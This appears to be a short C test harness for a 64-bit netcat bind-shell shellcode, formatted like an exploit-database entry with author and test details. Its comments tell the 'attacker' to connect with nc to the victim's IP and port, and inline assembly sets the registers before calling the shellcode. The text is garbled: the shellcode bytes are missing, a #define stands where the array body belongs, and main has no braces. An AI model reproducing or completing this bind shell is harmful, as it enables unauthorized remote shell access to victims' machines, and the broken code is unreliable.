#include <stdio.h>
#include <string.h>
// Exploit Title: [NetCat Bind Shell 64bit 64byte]
// Date: [6/28/2016]
// Exploit Author: [CripSlick]
// Tested on: [Kali 2.0]
// Version: [v1.10-41]
// ShepherdDowling@gmail.com
// OffSec ID: OS-20614
// Victim: netstat -an | grep LISTEN | grep tcp
// Attacker: nc <victim_IP> <port>
unsigned char code[] = \
#define PORT "\x39\x39"
// Keep to two bytes
int main ()
// I make sure there are no nulls
// The string count will terminate at the first \x00
printf("The Shellcode is %d Bytes Long\n", strlen(code));
// Next I throw 0xAAAAAAAA into every register before shellcode execution
// This ensures that the shellcode will run in any circumstance
__asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t"
"mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t"
"mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t"
"mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t"
"mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t"
"call code");
return 0;